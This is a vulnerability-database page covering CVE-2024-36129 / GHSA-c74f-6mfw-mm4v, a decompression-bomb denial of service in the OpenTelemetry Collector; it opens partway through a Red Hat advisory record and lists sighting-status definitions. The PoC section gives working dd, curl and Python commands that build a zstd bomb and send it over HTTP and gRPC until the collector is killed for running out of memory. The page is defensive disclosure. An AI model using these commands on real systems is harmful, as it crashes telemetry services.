"8Base-RHOSDT-3.2:rhosdt/tempo-gateway-rhel8@sha256:9518da59837ff3b7472cfaccfd6664672e3a053a227f119a051cda0570c9e653_arm64", "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-rhel8@sha256:a0421a538015440c2d6799be7f691ac98ddbe47216f3486a88c0e82c115f9a6a_s390x", "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-rhel8@sha256:a772a420a6a5a70baf1058c35b255b87cee307d7ae79f4bf72829b55f33338cf_ppc64le", "8Base-RHOSDT-3.2:rhosdt/tempo-gateway-rhel8@sha256:d04dc1a142258e8c7455d5c59157bd293f78ee7bb673a3783d23a7474b408394_amd64", "8Base-RHOSDT-3.2:rhosdt/tempo-operator-bundle@sha256:009d39b8894627b0be013239e842776dcdb8a26aa5c63aab005772ed68d2f46c_s390x", "8Base-RHOSDT-3.2:rhosdt/tempo-operator-bundle@sha256:2a395cc7eb2c67cdee59ecedb6c8497833fb14877c996e8d34f3555cd14ad7f7_ppc64le", "8Base-RHOSDT-3.2:rhosdt/tempo-operator-bundle@sha256:57cbaada2dce7abcabaf94d441e07d77126a60726adbb829808e157f9d0897cb_amd64", "8Base-RHOSDT-3.2:rhosdt/tempo-operator-bundle@sha256:7bbe7e744b4b7ad53375f02615fcb33b9980d65ed75b5c29688f1bd5accefaa3_arm64", "8Base-RHOSDT-3.2:rhosdt/tempo-query-rhel8@sha256:010d235813b78bc6c22ffd8d33bc5f77ad1a938213d77423cb52e7ba765723a5_s390x", "8Base-RHOSDT-3.2:rhosdt/tempo-query-rhel8@sha256:3e730362b9359e071dad1a0decf24a78ad374cc98b9606c16b0f7a6fb3a7bd9b_arm64", "8Base-RHOSDT-3.2:rhosdt/tempo-query-rhel8@sha256:455f3b2d5d0609cf76279cfdffd7176cf5427eedd5ec47b9ce8a2981a11e2903_amd64", "8Base-RHOSDT-3.2:rhosdt/tempo-query-rhel8@sha256:c6f07167aad12f099535db2ff76ff68ef8fa8420ec9c0ee9e59d338aae056edd_ppc64le", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8-operator@sha256:166cab89786ed016d10f325e0f0341e6e09a09cd25aa34876fb45db12b5aa172_amd64", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8-operator@sha256:2d7af49b7d6c8d04384c476b425fe767b8b6cf822e5a8ebe2e1ed804ea7ca1eb_arm64", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8-operator@sha256:42a5a38ad4c470350316ab09014b27967d49613f72b01f9590f2558c32ef7125_s390x", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8-operator@sha256:f21342c0d9a28a48cba35365807b4740663db1aa9ef0fe36ffc9a759e1864c71_ppc64le", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8@sha256:102db0e641f8d461d4ba92f445bdce425afddafddff006250405a3e1c931c2b7_ppc64le", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8@sha256:32a5030b147eb8ad4977c1ba9629ebb3154cf44ea5c2ced8c6f04469d6054f53_s390x", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8@sha256:396c6fcef9a4ab2627181359746ed68edf20d92f367c96a5f717cfe6517bd203_arm64", "8Base-RHOSDT-3.2:rhosdt/tempo-rhel8@sha256:bbe09630f77833bf75287b5ac987b5cc881e850d5f4f3080799fc07d31b87f47_amd64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2024-36129" }, { "category": "external", "summary": "RHBZ#2291337", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2291337" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2024-36129", "url": "https://www.cve.org/CVERecord?id=CVE-2024-36129" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-36129", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36129" } ], "release_date": "2024-06-05T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:0129388735cff9712b1c8cae7cbc0caaed94dbad9b8c9789de9789f58f484f8e_s390x", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:cd453aeddf5014a3b91d22f440847672fc58242617f82a64aa6e668d10cf5949_arm64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:ebadded6eb776515178cb85a024613ec873fbeb52a66e4176c582ed5443f960d_amd64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:ebb07388cfd4d8cb534e3903038e73bc927400bb066343ad0704eda0c63fa9ec_ppc64le" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2024:3943" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.2, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "version": "3.1" }, "products": [ "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:0129388735cff9712b1c8cae7cbc0caaed94dbad9b8c9789de9789f58f484f8e_s390x", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:cd453aeddf5014a3b91d22f440847672fc58242617f82a64aa6e668d10cf5949_arm64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:ebadded6eb776515178cb85a024613ec873fbeb52a66e4176c582ed5443f960d_amd64", "8Base-RHOSDT-3.2:rhosdt/opentelemetry-collector-rhel8@sha256:ebb07388cfd4d8cb534e3903038e73bc927400bb066343ad0704eda0c63fa9ec_ppc64le" ] } ], "threats": [ { "category": "impact", "details": "Important" } ], "title": "opentelemetry-collector: denial of service via specially crafted HTTP or gRPC request" } ] }
ghsa-c74f-6mfw-mm4v
Vulnerability from github
Summary
An unsafe decompression vulnerability allows unauthenticated attackers to crash the collector via excessive memory consumption.
Details
The OpenTelemetry Collector handles compressed HTTP requests by recognizing the Content-Encoding header, rewriting the HTTP request body, and allowing subsequent handlers to process decompressed data. It supports the gzip, zstd, zlib, snappy, and deflate compression algorithms. A "zip bomb" or "decompression bomb" is a malicious archive designed to crash or disable the system reading it. Decompression of HTTP requests is typically not enabled by default in popular server solutions due to associated security risks. A malicious attacker could leverage this weakness to crash the collector by sending a small request that, when uncompressed by the server, results in excessive memory consumption.
During proof-of-concept (PoC) testing, all supported compression algorithms could be abused, with zstd causing the most significant impact. Compressing 10GB of all-zero data reduced it to 329KB. Sending an HTTP request with this compressed data instantly consumed all available server memory (the testing server had 32GB), leading to an out-of-memory (OOM) kill of the collector application instance.
The root cause for this issue can be found in the following code path:
Affected File: https://github.com/open-telemetry/opentelemetry-collector/[...]confighttp/compression.go
Affected Code: ``` // httpContentDecompressor offloads the task of handling compressed HTTP requests // by identifying the compression format in the "Content-Encoding" header and re-writing // request body so that the handlers further in the chain can work on decompressed data. // It supports gzip and deflate/zlib compression. func httpContentDecompressor(h http.Handler, eh func(w http.ResponseWriter, r *http.Request, errorMsg string, statusCode int), decoders map[string]func(body io.ReadCloser) (io.ReadCloser, error)) http.Handler { [...] d := &decompressor{ errHandler: errHandler, base: h, decoders: map[string]func(body io.ReadCloser) (io.ReadCloser, error){ "": func(io.ReadCloser) (io.ReadCloser, error) { // Not a compressed payload. Nothing to do. return nil, nil }, [...] "zstd": func(body io.ReadCloser) (io.ReadCloser, error) { zr, err := zstd.NewReader( body, zstd.WithDecoderConcurrency(1), ) if err != nil { return nil, err } return zr.IOReadCloser(), nil }, [...] }
func (d decompressor) ServeHTTP(w http.ResponseWriter, r http.Request) { newBody, err := d.newBodyReader(r) if err != nil { d.errHandler(w, r, err.Error(), http.StatusBadRequest) return } [...] d.base.ServeHTTP(w, r) }
func (d decompressor) newBodyReader(r http.Request) (io.ReadCloser, error) { encoding := r.Header.Get(headerContentEncoding) decoder, ok := d.decoders[encoding] if !ok { return nil, fmt.Errorf("unsupported %s: %s", headerContentEncoding, encoding) } return decoder(r.Body) } ```
To mitigate this attack vector, it is recommended to either disable support for decompressing client HTTP requests entirely or limit the size of the decompressed data that can be processed. Limiting the decompressed data size can be achieved by wrapping the decompressed data reader inside an io.LimitedReader, which restricts the reading to a specified number of bytes. This approach helps prevent excessive memory usage and potential out-of-memory errors caused by decompression bombs.
PoC
This issue was confirmed as follows:
PoC Commands:
dd if=/dev/zero bs=1G count=10 | zstd > poc.zst
curl -vv "http://192.168.0.107:4318/v1/traces" -H "Content-Type: application/x-protobuf" -H "Content-Encoding: zstd" --data-binary @poc.zst
Output: ``` 10+0 records in 10+0 records out 10737418240 bytes (11 GB, 10 GiB) copied, 12,207 s, 880 MB/s
- processing: http://192.168.0.107:4318/v1/traces
- Trying 192.168.0.107:4318...
- Connected to 192.168.0.107 (192.168.0.107) port 4318
POST /v1/traces HTTP/1.1 Host: 192.168.0.107:4318 User-Agent: curl/8.2.1 Accept: / Content-Type: application/x-protobuf Content-Encoding: zstd Content-Length: 336655
- We are completely uploaded and fine
- Recv failure: Connection reset by peer
- Closing connection curl: (56) Recv failure: Connection reset by peer ```
Server logs:
otel-collector-1 | 2024-05-30T18:36:14.376Z info service@v0.101.0/service.go:102 Setting up own telemetry...
[...]
otel-collector-1 | 2024-05-30T18:36:14.385Z info otlpreceiver@v0.101.0/otlp.go:152 Starting HTTP server {"kind": "receiver", "name": "otlp", "data_type": "traces", "endpoint": "0.0.0.0:4318"}
otel-collector-1 | 2024-05-30T18:36:14.385Z info service@v0.101.0/service.go:195 Everything is ready. Begin running and processing data.
otel-collector-1 | 2024-05-30T18:36:14.385Z warn localhostgate/featuregate.go:63 The default endpoints for all servers in components will change to use localhost instead of 0.0.0.0 in a future version. Use the feature gate to preview the new default. {"feature gate ID": "component.UseLocalHostAsDefaultHost"}
otel-collector-1 exited with code 137
A similar problem exists for configgrpc when using the zstd compression:
dd if=/dev/zero bs=1G count=10 | zstd > poc.zst
python3 -c 'import os, struct; f = open("/tmp/body.raw", "w+b"); f.write(b"\x01"); f.write(struct.pack(">L", os.path.getsize("poc.zst"))); f.write(open("poc.zst", "rb").read())'
curl -vv http://127.0.0.1:4317/opentelemetry.proto.collector.trace.v1.TraceService/Export --http2-prior-knowledge -H "content-type: application/grpc" -H "grpc-encoding: zstd" --data-binary @/tmp/body.raw
Impact
Unauthenticated attackers can crash the collector via excessive memory consumption, stopping the entire collection of telemetry.
Patches
- The confighttp module version 0.102.0 contains a fix for this problem.
- The configgrpc module version 0.102.1 contains a fix for this problem.
- All official OTel Collector distributions starting with v0.102.1 contain both fixes.
Workarounds
- None.
References
- https://github.com/open-telemetry/opentelemetry-collector/pull/10289
- https://github.com/open-telemetry/opentelemetry-collector/pull/10323
- https://opentelemetry.io/blog/2024/cve-2024-36129/
Credits
This issue was uncovered during a security audit performed by 7ASecurity, facilitated by OSTIF, for the OpenTelemetry project.
{ "affected": [ { "package": { "ecosystem": "Go", "name": "go.opentelemetry.io/collector/config/confighttp" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.102.0" } ], "type": "ECOSYSTEM" } ] }, { "package": { "ecosystem": "Go", "name": "go.opentelemetry.io/collector/config/configgrpc" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "0.102.1" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2024-36129" ], "database_specific": { "cwe_ids": [ "CWE-119" ], "github_reviewed": true, "github_reviewed_at": "2024-06-05T16:56:19Z", "nvd_published_at": "2024-06-05T18:15:10Z", "severity": "HIGH" }, "details": "### Summary\nAn unsafe decompression vulnerability allows unauthenticated attackers to crash the collector via excessive memory consumption.\n\n### Details\nThe OpenTelemetry Collector handles compressed HTTP requests by recognizing the Content-Encoding header, rewriting the HTTP request body, and allowing subsequent handlers to process decompressed data. It supports the gzip, zstd, zlib, snappy, and deflate compression algorithms. A \"zip bomb\" or \"decompression bomb\" is a malicious archive designed to crash or disable the system reading it. Decompression of HTTP requests is typically not enabled by default in popular server solutions due to associated security risks. A malicious attacker could leverage this weakness to crash the collector by sending a small request that, when uncompressed by the server, results in excessive memory consumption.\n\nDuring proof-of-concept (PoC) testing, all supported compression algorithms could be abused, with zstd causing the most significant impact. Compressing 10GB of all-zero data reduced it to 329KB. Sending an HTTP request with this compressed data instantly consumed all available server memory (the testing server had 32GB), leading to an out-of-memory (OOM) kill of the collector application instance.\n\nThe root cause for this issue can be found in the following code path:\n\n**Affected File:**\n[https://github.com/open-telemetry/opentelemetry-collector/[...]confighttp/compression.go](https://github.com/open-telemetry/opentelemetry-collector/blob/062d0a7ffcd45831f993d21d1c6fb67d3e74b5e2/config/confighttp/compression.go) \n\n**Affected Code:**\n```\n// httpContentDecompressor offloads the task of handling compressed HTTP requests\n// by identifying the compression format in the \"Content-Encoding\" header and re-writing\n// request body so that the handlers further in the chain can work on decompressed data.\n// It supports gzip and deflate/zlib compression.\nfunc httpContentDecompressor(h http.Handler, eh func(w http.ResponseWriter, r *http.Request, errorMsg string, statusCode int), decoders map[string]func(body io.ReadCloser) (io.ReadCloser, error)) http.Handler {\n [...]\n d := \u0026decompressor{\n errHandler: errHandler,\n base: \th,\n decoders: map[string]func(body io.ReadCloser) (io.ReadCloser, error){\n \"\": func(io.ReadCloser) (io.ReadCloser, error) {\n // Not a compressed payload. Nothing to do.\n return nil, nil\n },\n [...]\n \"zstd\": func(body io.ReadCloser) (io.ReadCloser, error) {\n zr, err := zstd.NewReader(\n body,\n zstd.WithDecoderConcurrency(1),\n )\n if err != nil {\n return nil, err\n }\n return zr.IOReadCloser(), nil\n },\n [...]\n}\n\nfunc (d *decompressor) ServeHTTP(w http.ResponseWriter, r *http.Request) {\n newBody, err := d.newBodyReader(r)\n if err != nil {\n d.errHandler(w, r, err.Error(), http.StatusBadRequest)\n return\n }\n [...]\n d.base.ServeHTTP(w, r)\n}\n\nfunc (d *decompressor) newBodyReader(r *http.Request) (io.ReadCloser, error) {\n encoding := r.Header.Get(headerContentEncoding)\n decoder, ok := d.decoders[encoding]\n if !ok {\n return nil, fmt.Errorf(\"unsupported %s: %s\", headerContentEncoding, encoding)\n }\n return decoder(r.Body)\n}\n```\n\nTo mitigate this attack vector, it is recommended to either disable support for decompressing client HTTP requests entirely or limit the size of the decompressed data that can be processed. Limiting the decompressed data size can be achieved by wrapping the decompressed data reader inside an io.LimitedReader, which restricts the reading to a specified number of bytes. This approach helps prevent excessive memory usage and potential out-of-memory errors caused by decompression bombs.\n\n### PoC\nThis issue was confirmed as follows:\n\n**PoC Commands:**\n```\ndd if=/dev/zero bs=1G count=10 | zstd \u003e poc.zst\ncurl -vv \"http://192.168.0.107:4318/v1/traces\" -H \"Content-Type: application/x-protobuf\" -H \"Content-Encoding: zstd\" --data-binary @poc.zst\n```\n\n**Output:**\n```\n10+0 records in\n10+0 records out\n10737418240 bytes (11 GB, 10 GiB) copied, 12,207 s, 880 MB/s\n\n* processing: http://192.168.0.107:4318/v1/traces\n* Trying 192.168.0.107:4318...\n* Connected to 192.168.0.107 (192.168.0.107) port 4318\n\u003e POST /v1/traces HTTP/1.1\n\u003e Host: 192.168.0.107:4318\n\u003e User-Agent: curl/8.2.1\n\u003e Accept: */*\n\u003e Content-Type: application/x-protobuf\n\u003e Content-Encoding: zstd\n\u003e Content-Length: 336655\n\u003e\n* We are completely uploaded and fine\n* Recv failure: Connection reset by peer\n* Closing connection\ncurl: (56) Recv failure: Connection reset by peer\n```\n\n**Server logs:**\n```\notel-collector-1 | 2024-05-30T18:36:14.376Z info service@v0.101.0/service.go:102 Setting up own telemetry...\n[...]\notel-collector-1 | 2024-05-30T18:36:14.385Z info otlpreceiver@v0.101.0/otlp.go:152 Starting HTTP server {\"kind\": \"receiver\", \"name\": \"otlp\", \"data_type\": \"traces\", \"endpoint\": \"0.0.0.0:4318\"}\notel-collector-1 | 2024-05-30T18:36:14.385Z info service@v0.101.0/service.go:195 Everything is ready. Begin running and processing data.\notel-collector-1 | 2024-05-30T18:36:14.385Z warn localhostgate/featuregate.go:63 The default endpoints for all servers in components will change to use localhost instead of 0.0.0.0 in a future version. Use the feature gate to preview the new default. {\"feature gate ID\": \"component.UseLocalHostAsDefaultHost\"}\notel-collector-1 exited with code 137\n```\n\nA similar problem exists for configgrpc when using the zstd compression:\n\n```\ndd if=/dev/zero bs=1G count=10 | zstd \u003e poc.zst\npython3 -c \u0027import os, struct; f = open(\"/tmp/body.raw\", \"w+b\"); f.write(b\"\\x01\"); f.write(struct.pack(\"\u003eL\", os.path.getsize(\"poc.zst\"))); f.write(open(\"poc.zst\", \"rb\").read())\u0027\ncurl -vv http://127.0.0.1:4317/opentelemetry.proto.collector.trace.v1.TraceService/Export --http2-prior-knowledge -H \"content-type: application/grpc\" -H \"grpc-encoding: zstd\" --data-binary @/tmp/body.raw\n```\n\n### Impact\nUnauthenticated attackers can crash the collector via excessive memory consumption, stopping the entire collection of telemetry.\n\n### Patches\n- The confighttp module version 0.102.0 contains a fix for this problem.\n- The configgrpc module version 0.102.1 contains a fix for this problem.\n- All official OTel Collector distributions starting with v0.102.1 contain both fixes.\n\n### Workarounds\n- None.\n\n### References\n- https://github.com/open-telemetry/opentelemetry-collector/pull/10289\n- https://github.com/open-telemetry/opentelemetry-collector/pull/10323\n- https://opentelemetry.io/blog/2024/cve-2024-36129/\n\n### Credits\nThis issue was uncovered during a security audit performed by 7ASecurity, facilitated by OSTIF, for the OpenTelemetry project.", "id": "GHSA-c74f-6mfw-mm4v", "modified": "2024-06-17T15:20:43Z", "published": "2024-06-05T16:56:19Z", "references": [ { "type": "WEB", "url": "https://github.com/open-telemetry/opentelemetry-collector/security/advisories/GHSA-c74f-6mfw-mm4v" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36129" }, { "type": "WEB", "url": "https://github.com/open-telemetry/opentelemetry-collector/pull/10289" }, { "type": "WEB", "url": "https://github.com/open-telemetry/opentelemetry-collector/pull/10323" }, { "type": "PACKAGE", "url": "https://github.com/open-telemetry/opentelemetry-collector" }, { "type": "WEB", "url": "https://opentelemetry.io/blog/2024/cve-2024-36129" }, { "type": "WEB", "url": "https://pkg.go.dev/vuln/GO-2024-2900" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:H", "type": "CVSS_V3" } ], "summary": "Denial of Service via Zip/Decompression Bomb sent over HTTP or gRPC" }
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.